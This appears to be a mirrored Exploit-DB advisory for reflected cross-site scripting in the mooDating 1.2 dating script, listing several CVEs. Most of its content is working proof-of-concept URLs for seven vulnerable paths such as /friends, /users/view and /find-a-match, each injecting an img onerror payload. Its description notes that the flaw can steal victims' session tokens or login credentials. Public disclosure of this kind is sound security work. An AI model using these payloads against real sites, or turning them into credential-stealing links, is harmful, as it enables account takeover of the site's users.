mooDating 1.2 – Reflected Cross-site scripting (XSS)

  • 作者: CraCkEr
    日期: 2023-07-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51628/
  • # Exploit Title: mooDating 1.2 - Reflected Cross-site scripting (XSS)
    # Exploit Author: CraCkEr aka (skalvin)
    # Date: 22/07/2023
    # Vendor: mooSocial
    # Vendor Homepage: https://moodatingscript.com/
    # Software Link: https://demo.moodatingscript.com/home
    # Version: 1.2
    # Tested on: Windows 10 Pro
    # Impact: Manipulate the content of the site
    # CVE: CVE-2023-3849, CVE-2023-3848, CVE-2023-3847, CVE-2023-3846, CVE-2023-3843, CVE-2023-3845, CVE-2023-3844
    
    
    
    ## Greetings
    
    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
    CryptoJob (Twitter) twitter.com/0x0CryptoJob
    
    
    ## Description
    
    The attacker can send to victim a link containing a malicious URL in an email or instant message
    can perform a wide variety of actions, such as stealing the victim's session token or login credentials
    
    
    
    Path: /matchmakings/question
    
    URL parameter is vulnerable to RXSS
    
    https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=
    https://website/matchmakings/question[XSS]?number=
    
    
    Path: /friends
    
    URL parameter is vulnerable to RXSS
    
    https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model
    https://website/friends[XSS]/ajax_invite?mode=model
    
    
    Path: /friends/ajax_invite
    
    URL parameter is vulnerable to RXSS
    
    https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model
    https://website/friends/ajax_invite[XSS]?mode=model
    
    Path: /pages
    
    URL parameter is vulnerable to RXSS
    
    https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
    https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l
    
    Path: /users
    
    URL parameter is vulnerable to RXSS
    
    https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity
    https://website/user[XSS]/view/108?tab=activity
    
    Path: /users/view
    
    URL parameter is vulnerable to RXSS
    
    https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity
    https://website/users/view[XSS]/108?tab=activity
    
    
    Path: /find-a-match
    
    URL parameter is vulnerable to RXSS
    
    https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
    https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0
    
    
    [XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6
    
    
    [-] Done